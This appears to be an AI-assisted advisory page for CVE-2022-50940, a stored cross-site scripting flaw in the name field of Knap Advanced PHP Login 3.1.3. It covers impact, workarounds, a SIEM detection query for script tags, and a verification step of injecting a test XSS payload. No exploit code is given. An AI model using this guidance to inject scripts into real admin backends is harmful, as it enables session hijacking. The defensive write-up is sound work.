CVE-2022-50940 – Knap Advanced PHP Login 3.1.3 contains a persis... (How to Fix)

Q: What is the severity of CVE-2022-50940?

CVE-2022-50940 has a CVSS score of 6.4 (MEDIUM). Knap Advanced PHP Login 3.1.3 contains a persistent cross-site scripting (XSS) vulnerability in the name parameter. Attackers can inject malicious scripts that execute in backend modules when administrators view user or activity logs, potentially leading to session hijacking or phishing attacks. This affects all installations using the vulnerable version.

📋 TL;DR

Knap Advanced PHP Login 3.1.3 contains a persistent cross-site scripting (XSS) vulnerability in the name parameter. Attackers can inject malicious scripts that execute in backend modules when administrators view user or activity logs, potentially leading to session hijacking or phishing attacks. This affects all installations using the vulnerable version.

💻 Affected Systems

Products:

Knap Advanced PHP Login

Versions: 3.1.3

Operating Systems: Any OS running PHP

Default Config Vulnerable: ⚠️ Yes

Notes: All installations of version 3.1.3 are vulnerable regardless of configuration.

⚠️ Risk & Real-World Impact

🔴

Worst Case

Administrator account compromise leading to full system takeover, data theft, or deployment of additional malware.

🟠

Likely Case

Session hijacking of administrators, credential theft via phishing, or defacement of backend interfaces.

🟢

If Mitigated

Limited impact with proper input validation and output encoding, though backend functionality remains at risk.

🌐 Internet-Facing: HIGH

🏢 Internal Only: MEDIUM

🎯 Exploit Status

Public PoC: ⚠️ Yes

Weaponized: LIKELY

Unauthenticated Exploit: ✅ No

Complexity: LOW

Exploitation requires user registration or account creation to inject payload into name parameter.

🛠️ Fix & Mitigation

✅ Official Fix

Patch Version: Unknown

Vendor Advisory: https://laravel-vuejs.com/

Restart Required: No

Instructions:

1. Check vendor website for updated version. 2. If available, download and replace vulnerable files. 3. Test functionality after update.

🔧 Temporary Workarounds

Input Validation and Sanitization

all

Add server-side validation to sanitize name parameter input before storage.

Modify PHP code to use htmlspecialchars() or filter_var() on name parameter

Output Encoding

all

Ensure all user-controlled data is properly encoded when displayed in backend modules.

Implement htmlentities() or similar encoding when echoing name data

🧯 If You Can't Patch

Restrict access to backend modules to trusted IP addresses only
Implement web application firewall (WAF) rules to block XSS payloads in name parameter

🔍 How to Verify

Check if Vulnerable:

Check if running Knap Advanced PHP Login version 3.1.3 by examining version files or configuration.

Check Version:

grep -r 'version' /path/to/knap/installation/ or check config files

Verify Fix Applied:

Test by attempting to inject basic XSS payload in name field during registration and checking if it executes in backend.

📡 Detection & Monitoring

Log Indicators:

Unusual long name entries in user registration logs
JavaScript or HTML tags in name field logs

Network Indicators:

POST requests with script tags in name parameter to registration endpoints

SIEM Query:

source="web_logs" AND (name="*<script>*" OR name="*javascript:*")

📊 Metadata

CVE ID: CVE-2022-50940

CVSS v3 Score: 6.4 (MEDIUM)

CVSS Vector: CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:C/C:L/I:L/A:N

CWE: CWE-79

Published: February 1, 2026

Last Updated: February 4, 2026

🤖 AI-assisted analysis, reviewed for accuracy